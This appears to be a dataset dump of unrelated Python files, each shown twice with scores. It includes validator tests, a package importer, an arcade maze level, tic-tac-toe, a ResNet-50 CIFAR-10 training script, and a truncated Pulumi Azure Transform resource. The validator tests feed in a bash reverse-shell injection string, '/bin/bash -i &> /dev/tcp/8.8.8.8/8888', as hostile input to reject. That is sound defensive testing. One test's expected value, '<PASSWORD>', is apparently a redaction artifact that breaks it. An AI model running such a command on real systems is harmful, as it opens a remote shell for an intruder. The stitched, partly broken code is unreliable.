('\'p\'a\'s\'s\'w\'o\'r\'d\'', quote('\'p\'a\'s\'s\'w\'o\'r\'d\'')), ('Passw0rd', '<PASSWORD>'), ('\'; /bin/bash -i &> /dev/tcp/8.8.8.8/8888 0<&1 #', quote('\'; /bin/bash -i &> /dev/tcp/8.8.8.8/8888 0<&1 #'))]) def test_password_must_eliminate_single_quote_in_other_cases_must_leave_value_unchanged(value, expected): assert password(value) == expected @pytest.mark.parametrize('value, expected', [('\'; /bin/bash -i &> /dev/tcp/8.8.8.8/8888 0<&1 #', True), ('0', True), ('1', True), ('', False)]) def test_boolean_all_none_empty_strings_are_true_and_empty_is_false(value, expected): assert boolean(value) == expected @pytest.mark.parametrize('value', ['linux', 'none']) def test_platform_must_allow_only_linux_and_none(value): assert platform(value) == value def test_platform_must_raise_if_non_acceptable_value(): with pytest.raises(ValueError): platform('asdf')
app/validator_test.py
from validator import ip_address, user_name, password, boolean, platform, MAX_PASSWD_LEN from shlex import quote import pytest @pytest.mark.parametrize('value', ['0.0.0.0', '255.255.255.255', '1.1.1.1']) def test_ip_address_must_not_raise_if_valid_value_provided(value): assert ip_address(value) == value @pytest.mark.parametrize('value', ['\'; /bin/bash -i &> /dev/tcp/8.8.8.8/8888 0<&1 #', '0.0.0', '1.1.1.1/24', '11a.22.22.22', '127.0.0.1']) def test_ip_address_must_raise_value_error_if_invalid_value_provided(value): with pytest.raises(ValueError): ip_address(value) def test_user_name_must_accept_only_root(): assert user_name('root') == 'root' @pytest.mark.parametrize('value', ['root1', 'asdf', 'name']) def test_user_name_must_allow_only_root(value): with pytest.raises(ValueError): user_name(value) def test_password_must_be_under_32_characters_len_instead_must_raise(): with pytest.raises(ValueError): password('*' * (MAX_PASSWD_LEN + 1)) @pytest.mark.parametrize('value, expected', [('*' * MAX_PASSWD_LEN, quote('*' * MAX_PASSWD_LEN)), ('\'p\'a\'s\'s\'w\'o\'r\'d\'', quote('\'p\'a\'s\'s\'w\'o\'r\'d\'')), ('Passw0rd', '<PASSWORD>'), ('\'; /bin/bash -i &> /dev/tcp/8.8.8.8/8888 0<&1 #', quote('\'; /bin/bash -i &> /dev/tcp/8.8.8.8/8888 0<&1 #'))]) def test_password_must_eliminate_single_quote_in_other_cases_must_leave_value_unchanged(value, expected): assert password(value) == expected @pytest.mark.parametrize('value, expected', [('\'; /bin/bash -i &> /dev/tcp/8.8.8.8/8888 0<&1 #', True), ('0', True), ('1', True), ('', False)]) def test_boolean_all_none_empty_strings_are_true_and_empty_is_false(value, expected): assert boolean(value) == expected @pytest.mark.parametrize('value', ['linux', 'none']) def test_platform_must_allow_only_linux_and_none(value): assert platform(value) == value def test_platform_must_raise_if_non_acceptable_value(): with pytest.raises(ValueError): platform('asdf')
0.511961
0.334426
from __future__ import print_function, division, absolute_import import os import sys import pkgutil import traceback import importlib from collections import OrderedDict from tpDcc.libs.python import python def import_module(module_name): """ Static function used to import a function given its complete name :param module_name: str, name of the module we want to import """ try: mod = importlib.import_module(module_name) # print('Imported: {} | {}'.format(module_name, mod)) return mod except Exception: try: print('FAILED IMPORT: {} -> {}'.format(str(module_name), str(traceback.format_exc()))) except Exception: print('FAILED IMPORT: {}'.format(module_name)) def reload_module(module_to_reload): """ Reloads given module :param module_to_reload: mode """ if sys.version[0] <= '2': reload(module_to_reload) else: importlib.reload(module_to_reload) def import_submodules(package_dot_path, skip_modules, recursive=True): """ Import all the modules of the package """ extra_skip = tuple(['{}.'.format(mod) for mod in skip_modules]) def _import_submodules(pkg): found_modules = list() if python.is_string(pkg): pkg = import_module(pkg) if not pkg: return found_modules pkg_paths = tuple([os.path.normpath(pkg_path) for pkg_path in pkg.__path__ if pkg is not None]) for pkg_path in list(pkg_paths): for loader, name, is_pkg in pkgutil.walk_packages(pkg_paths): loader_path = os.path.normpath(loader.path) full_name = pkg.__name__ + '.' + name if not loader_path.startswith(pkg_path): # print('Trying to import non valid module: {} | {}'.format(full_name, loader_path)) continue if full_name in skip_modules or full_name.startswith(extra_skip): # print('Skipping .... 
{}'.format(full_name)) continue found_modules.append(full_name) if recursive and is_pkg: found_modules.extend(_import_submodules(full_name)) return found_modules modules_to_import = [package_dot_path] modules_to_import.extend(list(set(_import_submodules(package_dot_path)))) loaded_modules = OrderedDict() for full_name in modules_to_import: loaded_modules[full_name] = import_module(full_name) return loaded_modules class PackageImporter(object): """ Base class that allows to import/reload all the modules in a given package and in a given order """ def __init__(self, package): super(PackageImporter, self).__init__() self._package = package self.loaded_modules = OrderedDict() self.reload_modules = list() def import_package(self, skip_modules=None): skip_modules = skip_modules if skip_modules else list() skip_modules = tuple(mod for mod in skip_modules) return import_submodules(self._package, skip_modules=skip_modules) def init_importer(package, skip_modules=None): """ Initializes importer :param package: :param skip_modules: bool :return: """ new_importer = PackageImporter(package) new_importer.import_package(skip_modules=skip_modules) return new_importer
tpDcc/libs/python/importer.py
from __future__ import print_function, division, absolute_import import os import sys import pkgutil import traceback import importlib from collections import OrderedDict from tpDcc.libs.python import python def import_module(module_name): """ Static function used to import a function given its complete name :param module_name: str, name of the module we want to import """ try: mod = importlib.import_module(module_name) # print('Imported: {} | {}'.format(module_name, mod)) return mod except Exception: try: print('FAILED IMPORT: {} -> {}'.format(str(module_name), str(traceback.format_exc()))) except Exception: print('FAILED IMPORT: {}'.format(module_name)) def reload_module(module_to_reload): """ Reloads given module :param module_to_reload: mode """ if sys.version[0] <= '2': reload(module_to_reload) else: importlib.reload(module_to_reload) def import_submodules(package_dot_path, skip_modules, recursive=True): """ Import all the modules of the package """ extra_skip = tuple(['{}.'.format(mod) for mod in skip_modules]) def _import_submodules(pkg): found_modules = list() if python.is_string(pkg): pkg = import_module(pkg) if not pkg: return found_modules pkg_paths = tuple([os.path.normpath(pkg_path) for pkg_path in pkg.__path__ if pkg is not None]) for pkg_path in list(pkg_paths): for loader, name, is_pkg in pkgutil.walk_packages(pkg_paths): loader_path = os.path.normpath(loader.path) full_name = pkg.__name__ + '.' + name if not loader_path.startswith(pkg_path): # print('Trying to import non valid module: {} | {}'.format(full_name, loader_path)) continue if full_name in skip_modules or full_name.startswith(extra_skip): # print('Skipping .... 
{}'.format(full_name)) continue found_modules.append(full_name) if recursive and is_pkg: found_modules.extend(_import_submodules(full_name)) return found_modules modules_to_import = [package_dot_path] modules_to_import.extend(list(set(_import_submodules(package_dot_path)))) loaded_modules = OrderedDict() for full_name in modules_to_import: loaded_modules[full_name] = import_module(full_name) return loaded_modules class PackageImporter(object): """ Base class that allows to import/reload all the modules in a given package and in a given order """ def __init__(self, package): super(PackageImporter, self).__init__() self._package = package self.loaded_modules = OrderedDict() self.reload_modules = list() def import_package(self, skip_modules=None): skip_modules = skip_modules if skip_modules else list() skip_modules = tuple(mod for mod in skip_modules) return import_submodules(self._package, skip_modules=skip_modules) def init_importer(package, skip_modules=None): """ Initializes importer :param package: :param skip_modules: bool :return: """ new_importer = PackageImporter(package) new_importer.import_package(skip_modules=skip_modules) return new_importer
0.32306
0.07971
import random import arcade from constants import * from randomly_place_sprite import randomly_place_sprite from wander_sprite import WanderSprite def _create_grid_with_cells(width, height): """ Create a grid with empty cells on odd row/column combinations. """ grid = [] for row in range(height): grid.append([]) for column in range(width): if column % 2 == 1 and row % 2 == 1: grid[row].append(0) elif column == 0 or row == 0 or column == width - 1 or row == height - 1: grid[row].append(1) else: grid[row].append(1) return grid def get_level_2_array(): maze = _create_grid_with_cells(GRID_WIDTH, GRID_HEIGHT) w = (len(maze[0]) - 1) // 2 h = (len(maze) - 1) // 2 vis = [[0] * w + [1] for _ in range(h)] + [[1] * (w + 1)] def walk(x, y): vis[y][x] = 1 d = [(x - 1, y), (x, y + 1), (x + 1, y), (x, y - 1)] random.shuffle(d) for (xx, yy) in d: if vis[yy][xx]: continue if xx == x: maze[max(y, yy) * 2][x * 2 + 1] = 0 if yy == y: maze[y * 2 + 1][max(x, xx) * 2] = 0 walk(xx, yy) walk(random.randrange(w), random.randrange(h)) # Randomly open some extra passages count = 0 while count < 10: x = random.randrange(5, GRID_WIDTH - 5) y = random.randrange(5, GRID_HEIGHT - 5) if maze[y][x] != 0 and maze[y-1][x] != 0 and maze[y+1][x]: maze[y][x] = 0 count += 1 elif maze[y][x] != 0 and maze[y][x-1] != 0 and maze[y][x+1]: maze[y][x] = 0 count += 1 return maze def add_level_2_creatures(level): level.creature_list = arcade.SpriteList() key = arcade.Sprite("images/key-02.png", OBJECT_SPRITE_SCALING) key.tag = "key-02" randomly_place_sprite(key, level.wall_list) level.objects_list.append(key) for i in range(3): skull = WanderSprite("images/skull.png", CREATURE_SPRITE_SCALING) skull.tag = "skull" skull.dialog_list = ["Woooo!"] skull.physics_engine = arcade.PhysicsEngineSimple(skull, level.all_obstacles) randomly_place_sprite(skull, level.wall_list) level.creature_list.append(skull)
source/level_2.py
import random import arcade from constants import * from randomly_place_sprite import randomly_place_sprite from wander_sprite import WanderSprite def _create_grid_with_cells(width, height): """ Create a grid with empty cells on odd row/column combinations. """ grid = [] for row in range(height): grid.append([]) for column in range(width): if column % 2 == 1 and row % 2 == 1: grid[row].append(0) elif column == 0 or row == 0 or column == width - 1 or row == height - 1: grid[row].append(1) else: grid[row].append(1) return grid def get_level_2_array(): maze = _create_grid_with_cells(GRID_WIDTH, GRID_HEIGHT) w = (len(maze[0]) - 1) // 2 h = (len(maze) - 1) // 2 vis = [[0] * w + [1] for _ in range(h)] + [[1] * (w + 1)] def walk(x, y): vis[y][x] = 1 d = [(x - 1, y), (x, y + 1), (x + 1, y), (x, y - 1)] random.shuffle(d) for (xx, yy) in d: if vis[yy][xx]: continue if xx == x: maze[max(y, yy) * 2][x * 2 + 1] = 0 if yy == y: maze[y * 2 + 1][max(x, xx) * 2] = 0 walk(xx, yy) walk(random.randrange(w), random.randrange(h)) # Randomly open some extra passages count = 0 while count < 10: x = random.randrange(5, GRID_WIDTH - 5) y = random.randrange(5, GRID_HEIGHT - 5) if maze[y][x] != 0 and maze[y-1][x] != 0 and maze[y+1][x]: maze[y][x] = 0 count += 1 elif maze[y][x] != 0 and maze[y][x-1] != 0 and maze[y][x+1]: maze[y][x] = 0 count += 1 return maze def add_level_2_creatures(level): level.creature_list = arcade.SpriteList() key = arcade.Sprite("images/key-02.png", OBJECT_SPRITE_SCALING) key.tag = "key-02" randomly_place_sprite(key, level.wall_list) level.objects_list.append(key) for i in range(3): skull = WanderSprite("images/skull.png", CREATURE_SPRITE_SCALING) skull.tag = "skull" skull.dialog_list = ["Woooo!"] skull.physics_engine = arcade.PhysicsEngineSimple(skull, level.all_obstacles) randomly_place_sprite(skull, level.wall_list) level.creature_list.append(skull)
0.415373
0.48377
from Sanitize import * def TicTacToe(): board = [" ", " ", " ", " ", " ", " ", " ", " ", " "] def print_board(): print("", board[0], "|", board[1], "|", board[2]) print("---+---+---") print("", board[3], "|", board[4], "|", board[5]) print("---+---+---") print("", board[6], "|", board[7], "|", board[8]) def victory_check(piece, player): if board[0] == board[1] == board[2] == piece or \ board[3] == board[4] == board[5] == piece or \ board[6] == board[7] == board[8] == piece or \ board[0] == board[3] == board[6] == piece or \ board[1] == board[4] == board[7] == piece or \ board[2] == board[5] == board[8] == piece or \ board[0] == board[4] == board[8] == piece or \ board[2] == board[4] == board[6] == piece: print_board() print(f"Player {player} Wins!") return True def piece_placement(piece): while True: piece_target = validator("+") print_board() if piece_target > 9 or piece_target < 1: print("There's no such position!") pass elif board[piece_target - 1] != " ": print("That space is already filled! Please choose another position") pass else: break board[piece_target - 1] = piece for turn in range(1, 11): if " " not in board: print("You're all out of positions to place more pieces." "It's a draw!") break player_list = [2, 1] piece_list = ["O", "X"] print_board() print(f"where will you be placing your piece, player {player_list[turn % 2]}?") piece_placement(piece_list[turn % 2 != 0]) if victory_check(piece_list[turn % 2 != 0], player_list[turn % 2]): break def restart_check(): print("Would you like to play another game? (Y,N)") restart = input().lower() while restart != "y" and restart != "n": print("The valid inputs are either Y or N.") restart = input() while restart == "y": TicTacToe() print("Would you like to play another game? (Y,N)") restart = input() if restart == "n": print("\n\n\nGame Over!") TicTacToe() restart_check()
TicTacToeOpt.py
from Sanitize import * def TicTacToe(): board = [" ", " ", " ", " ", " ", " ", " ", " ", " "] def print_board(): print("", board[0], "|", board[1], "|", board[2]) print("---+---+---") print("", board[3], "|", board[4], "|", board[5]) print("---+---+---") print("", board[6], "|", board[7], "|", board[8]) def victory_check(piece, player): if board[0] == board[1] == board[2] == piece or \ board[3] == board[4] == board[5] == piece or \ board[6] == board[7] == board[8] == piece or \ board[0] == board[3] == board[6] == piece or \ board[1] == board[4] == board[7] == piece or \ board[2] == board[5] == board[8] == piece or \ board[0] == board[4] == board[8] == piece or \ board[2] == board[4] == board[6] == piece: print_board() print(f"Player {player} Wins!") return True def piece_placement(piece): while True: piece_target = validator("+") print_board() if piece_target > 9 or piece_target < 1: print("There's no such position!") pass elif board[piece_target - 1] != " ": print("That space is already filled! Please choose another position") pass else: break board[piece_target - 1] = piece for turn in range(1, 11): if " " not in board: print("You're all out of positions to place more pieces." "It's a draw!") break player_list = [2, 1] piece_list = ["O", "X"] print_board() print(f"where will you be placing your piece, player {player_list[turn % 2]}?") piece_placement(piece_list[turn % 2 != 0]) if victory_check(piece_list[turn % 2 != 0], player_list[turn % 2]): break def restart_check(): print("Would you like to play another game? (Y,N)") restart = input().lower() while restart != "y" and restart != "n": print("The valid inputs are either Y or N.") restart = input() while restart == "y": TicTacToe() print("Would you like to play another game? (Y,N)") restart = input() if restart == "n": print("\n\n\nGame Over!") TicTacToe() restart_check()
0.298696
0.645511
from os import X_OK import torch import torchvision from net.cvt_offical import get_cvt13_pretrained from utils import train_transform, test_transform,initialize,smooth_crossentropy from config import device from ptflops import get_model_complexity_info import torch.nn.functional as F import torch.nn as nn initialize(42) device = torch.device('cuda:0') model = torchvision.models.resnet50(pretrained=True) flops, params = get_model_complexity_info(model,(3,224,224),print_per_layer_stat=False) print('flops',flops, 'params',params) model.fc = nn.Linear(512*4,10) model.to(device) # flops 4.06 GMac params 19.6 M 均比resnet50小 BATCH = 32 trainset = torchvision.datasets.CIFAR10(root='/datasets/CIFAR10', train=True, download=True, transform=train_transform) trainloader = torch.utils.data.DataLoader(trainset, batch_size=BATCH, shuffle=True) testset = torchvision.datasets.CIFAR10(root='/datasets/CIFAR10', train=False, download=True, transform=test_transform) testloader = torch.utils.data.DataLoader(testset, batch_size=BATCH, shuffle=False) LR = 1e-3 DECAY = 0 EPOCH = 20 optimizer = torch.optim.SGD(model.parameters(),lr=LR,momentum=0.9,weight_decay=DECAY) def train(dataloader,train_sam=False): model.train() tot_loss = 0 tot_num = 0 for i,data in enumerate(dataloader): x,y = data x = x.to(device) y = y.to(device) x = F.interpolate(x, size=(224,224), mode='bilinear', align_corners=True) logits = model(x) #非SAM if train_sam is False: optimizer.zero_grad() loss = smooth_crossentropy(logits,y).mean() loss.backward() optimizer.step() #可以考虑使用SAM进行训练 else: loss = smooth_crossentropy(logits,y).mean() loss.backward() optimizer.first_step(zero_grad=True) # second forward-backward step smooth_crossentropy(model(x), y).mean().backward() optimizer.second_step(zero_grad=True) tot_loss += loss.item() tot_num += x.shape[0] return tot_loss / tot_num def test(dataloader): model.eval() correct = 0 num = 0 for i,data in enumerate(dataloader): x,y = data x = x.to(device) y = y.to(device) x = 
F.interpolate(x, size=(224,224), mode='bilinear', align_corners=True) logits = model(x) pred = logits.argmax(1) correct += torch.sum(pred==y).item() num += x.shape[0] acc = correct / num return acc if __name__ == '__main__': accs = [] losses = [] model_path = 'pth/resnet50.pth' for epoch in range(EPOCH): #训练sam大叔优化器,也可以考虑使用KFAC优化器 loss = train(trainloader) testacc = test(testloader) accs.append(testacc) losses.append(loss) if epoch % 1 == 0: print('epoch',epoch,'loss',loss,'acc',testacc) #可以考虑使用scheduler #scheduler(epoch) torch.save(model.state_dict(),model_path)
cmp_resnet.py
from os import X_OK
import torch
import torchvision
from net.cvt_offical import get_cvt13_pretrained
from utils import train_transform, test_transform, initialize, smooth_crossentropy
from config import device
from ptflops import get_model_complexity_info
import torch.nn.functional as F
import torch.nn as nn

# Seed all RNGs for reproducibility (see utils.initialize).
initialize(42)
device = torch.device('cuda:0')  # intentionally shadows the device imported from config

model = torchvision.models.resnet50(pretrained=True)
flops, params = get_model_complexity_info(model, (3, 224, 224), print_per_layer_stat=False)
print('flops', flops, 'params', params)
# Swap the ImageNet classification head for a 10-class CIFAR-10 head
# (2048 = 512 * ResNet bottleneck expansion 4).
model.fc = nn.Linear(512 * 4, 10)
model.to(device)
# NOTE(review): the original "flops 4.06 GMac params 19.6 M, both smaller than
# resnet50" comment was copied from a CvT-13 script; this model IS resnet50.

BATCH = 32
trainset = torchvision.datasets.CIFAR10(root='/datasets/CIFAR10', train=True, download=True, transform=train_transform)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=BATCH, shuffle=True)
testset = torchvision.datasets.CIFAR10(root='/datasets/CIFAR10', train=False, download=True, transform=test_transform)
testloader = torch.utils.data.DataLoader(testset, batch_size=BATCH, shuffle=False)

LR = 1e-3
DECAY = 0
EPOCH = 20
optimizer = torch.optim.SGD(model.parameters(), lr=LR, momentum=0.9, weight_decay=DECAY)


def train(dataloader, train_sam=False):
    """Train for one epoch; return the mean per-sample smoothed-CE loss.

    :param dataloader: yields (images, labels) batches.
    :param train_sam: if True, ``optimizer`` must be a SAM wrapper providing
        ``first_step``/``second_step``; otherwise a plain SGD step is used.
    """
    model.train()
    tot_loss = 0.0
    tot_num = 0
    for x, y in dataloader:
        x = x.to(device)
        y = y.to(device)
        # Upsample 32x32 CIFAR images to ResNet-50's expected 224x224 input.
        x = F.interpolate(x, size=(224, 224), mode='bilinear', align_corners=True)
        logits = model(x)
        if train_sam is False:
            # Standard single-step update.
            optimizer.zero_grad()
            loss = smooth_crossentropy(logits, y).mean()
            loss.backward()
            optimizer.step()
        else:
            # SAM requires a second forward-backward pass after the ascent step.
            loss = smooth_crossentropy(logits, y).mean()
            loss.backward()
            optimizer.first_step(zero_grad=True)
            smooth_crossentropy(model(x), y).mean().backward()
            optimizer.second_step(zero_grad=True)
        # BUGFIX: weight each per-batch mean loss by its batch size; the
        # original divided a sum of batch means by the number of samples,
        # which under-reports the loss by about a factor of BATCH.
        tot_loss += loss.item() * x.shape[0]
        tot_num += x.shape[0]
    return tot_loss / tot_num


def test(dataloader):
    """Return top-1 accuracy of the global ``model`` over ``dataloader``."""
    model.eval()
    correct = 0
    num = 0
    # BUGFIX: evaluation must not track gradients; the original leaked
    # autograd state (and memory) on every test batch.
    with torch.no_grad():
        for x, y in dataloader:
            x = x.to(device)
            y = y.to(device)
            x = F.interpolate(x, size=(224, 224), mode='bilinear', align_corners=True)
            logits = model(x)
            pred = logits.argmax(1)
            correct += torch.sum(pred == y).item()
            num += x.shape[0]
    return correct / num


if __name__ == '__main__':
    accs = []
    losses = []
    model_path = 'pth/resnet50.pth'
    for epoch in range(EPOCH):
        # SAM/KFAC optimizers could be used via train(..., train_sam=True).
        loss = train(trainloader)
        testacc = test(testloader)
        accs.append(testacc)
        losses.append(loss)
        # The original guard `epoch % 1 == 0` was always true — print every epoch.
        print('epoch', epoch, 'loss', loss, 'acc', testacc)
        # Optional: step a learning-rate scheduler here.
    torch.save(model.state_dict(), model_path)
0.554712
0.386821
# NOTE(review): this module follows the layout of Pulumi's auto-generated
# provider SDK files (input-args class, state class, resource class). Changes
# should normally be made in the code generator, not hand-edited here.
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *

__all__ = ['TransformArgs', 'Transform']


@pulumi.input_type
class TransformArgs:
    # Arguments accepted when *creating* a Transform; required fields are
    # positional-keyword with no default, optional ones default to None.
    def __init__(__self__, *,
                 media_services_account_name: pulumi.Input[str],
                 resource_group_name: pulumi.Input[str],
                 description: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 outputs: Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]] = None):
        """
        The set of arguments for constructing a Transform resource.
        :param pulumi.Input[str] media_services_account_name: The Media Services account name. Changing this forces a new Transform to be created.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created.
        :param pulumi.Input[str] description: An optional verbose description of the Transform.
        :param pulumi.Input[str] name: The name which should be used for this Transform. Changing this forces a new Transform to be created.
        :param pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]] outputs: One or more `output` blocks as defined below. At least one `output` must be defined.
        """
        pulumi.set(__self__, "media_services_account_name", media_services_account_name)
        pulumi.set(__self__, "resource_group_name", resource_group_name)
        # Optional fields are only recorded when explicitly provided.
        if description is not None:
            pulumi.set(__self__, "description", description)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if outputs is not None:
            pulumi.set(__self__, "outputs", outputs)

    @property
    @pulumi.getter(name="mediaServicesAccountName")
    def media_services_account_name(self) -> pulumi.Input[str]:
        """
        The Media Services account name. Changing this forces a new Transform to be created.
        """
        return pulumi.get(self, "media_services_account_name")

    @media_services_account_name.setter
    def media_services_account_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "media_services_account_name", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> pulumi.Input[str]:
        """
        The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "resource_group_name", value)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        An optional verbose description of the Transform.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name which should be used for this Transform. Changing this forces a new Transform to be created.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def outputs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]]:
        """
        One or more `output` blocks as defined below. At least one `output` must be defined.
        """
        return pulumi.get(self, "outputs")

    @outputs.setter
    def outputs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]]):
        pulumi.set(self, "outputs", value)


@pulumi.input_type
class _TransformState:
    # State snapshot used by Transform.get() lookups; every field is optional.
    def __init__(__self__, *,
                 description: Optional[pulumi.Input[str]] = None,
                 media_services_account_name: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 outputs: Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering Transform resources.
        :param pulumi.Input[str] description: An optional verbose description of the Transform.
        :param pulumi.Input[str] media_services_account_name: The Media Services account name. Changing this forces a new Transform to be created.
        :param pulumi.Input[str] name: The name which should be used for this Transform. Changing this forces a new Transform to be created.
        :param pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]] outputs: One or more `output` blocks as defined below. At least one `output` must be defined.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created.
        """
        if description is not None:
            pulumi.set(__self__, "description", description)
        if media_services_account_name is not None:
            pulumi.set(__self__, "media_services_account_name", media_services_account_name)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if outputs is not None:
            pulumi.set(__self__, "outputs", outputs)
        if resource_group_name is not None:
            pulumi.set(__self__, "resource_group_name", resource_group_name)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        An optional verbose description of the Transform.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter(name="mediaServicesAccountName")
    def media_services_account_name(self) -> Optional[pulumi.Input[str]]:
        """
        The Media Services account name. Changing this forces a new Transform to be created.
        """
        return pulumi.get(self, "media_services_account_name")

    @media_services_account_name.setter
    def media_services_account_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "media_services_account_name", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The name which should be used for this Transform. Changing this forces a new Transform to be created.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter
    def outputs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]]:
        """
        One or more `output` blocks as defined below. At least one `output` must be defined.
        """
        return pulumi.get(self, "outputs")

    @outputs.setter
    def outputs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TransformOutputArgs']]]]):
        pulumi.set(self, "outputs", value)

    @property
    @pulumi.getter(name="resourceGroupName")
    def resource_group_name(self) -> Optional[pulumi.Input[str]]:
        """
        The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created.
        """
        return pulumi.get(self, "resource_group_name")

    @resource_group_name.setter
    def resource_group_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "resource_group_name", value)


class Transform(pulumi.CustomResource):
    # Two @overload stubs document the supported call shapes; the real
    # __init__ below dispatches between them via get_resource_args_opts.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 media_services_account_name: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 outputs: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Manages a Transform.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_azure as azure

        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
        example_account = azure.storage.Account("exampleAccount",
            resource_group_name=example_resource_group.name,
            location=example_resource_group.location,
            account_tier="Standard",
            account_replication_type="GRS")
        example_service_account = azure.media.ServiceAccount("exampleServiceAccount",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            storage_accounts=[azure.media.ServiceAccountStorageAccountArgs(
                id=example_account.id,
                is_primary=True,
            )])
        example_transform = azure.media.Transform("exampleTransform",
            resource_group_name=example_resource_group.name,
            media_services_account_name=example_service_account.name,
            description="My transform description",
            outputs=[azure.media.TransformOutputArgs(
                relative_priority="Normal",
                on_error_action="ContinueJob",
                builtin_preset=azure.media.TransformOutputBuiltinPresetArgs(
                    preset_name="AACGoodQualityAudio",
                ),
            )])
        ```
        ### With Multiple Outputs

        ```python
        import pulumi
        import pulumi_azure as azure

        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
        example_account = azure.storage.Account("exampleAccount",
            resource_group_name=example_resource_group.name,
            location=example_resource_group.location,
            account_tier="Standard",
            account_replication_type="GRS")
        example_service_account = azure.media.ServiceAccount("exampleServiceAccount",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            storage_accounts=[azure.media.ServiceAccountStorageAccountArgs(
                id=example_account.id,
                is_primary=True,
            )])
        example_transform = azure.media.Transform("exampleTransform",
            resource_group_name=example_resource_group.name,
            media_services_account_name=example_service_account.name,
            description="My transform description",
            outputs=[
                azure.media.TransformOutputArgs(
                    relative_priority="Normal",
                    on_error_action="ContinueJob",
                    builtin_preset=azure.media.TransformOutputBuiltinPresetArgs(
                        preset_name="AACGoodQualityAudio",
                    ),
                ),
                azure.media.TransformOutputArgs(
                    relative_priority="Low",
                    on_error_action="ContinueJob",
                    audio_analyzer_preset=azure.media.TransformOutputAudioAnalyzerPresetArgs(
                        audio_language="en-US",
                        audio_analysis_mode="Basic",
                    ),
                ),
                azure.media.TransformOutputArgs(
                    relative_priority="Low",
                    on_error_action="StopProcessingJob",
                    face_detector_preset=azure.media.TransformOutputFaceDetectorPresetArgs(
                        analysis_resolution="StandardDefinition",
                    ),
                ),
            ])
        ```

        ## Import

        Transforms can be imported using the `resource id`, e.g.

        ```sh
         $ pulumi import azure:media/transform:Transform example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Media/mediaservices/media1/transforms/transform1
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] description: An optional verbose description of the Transform.
        :param pulumi.Input[str] media_services_account_name: The Media Services account name. Changing this forces a new Transform to be created.
        :param pulumi.Input[str] name: The name which should be used for this Transform. Changing this forces a new Transform to be created.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TransformOutputArgs']]]] outputs: One or more `output` blocks as defined below. At least one `output` must be defined.
        :param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Transform should exist. Changing this forces a new Transform to be created.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: TransformArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages a Transform.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_azure as azure

        example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
        example_account = azure.storage.Account("exampleAccount",
            resource_group_name=example_resource_group.name,
            location=example_resource_group.location,
            account_tier="Standard",
            account_replication_type="GRS")
        example_service_account = azure.media.ServiceAccount("exampleServiceAccount",
            location=example_resource_group.location,
            resource_group_name=example_resource_group.name,
            storage_accounts=[azure.media.ServiceAccountStorageAccountArgs(
                id=example_account.id,
                is_primary=True,
            )])
        example_transform = azure.media.Transform("exampleTransform",
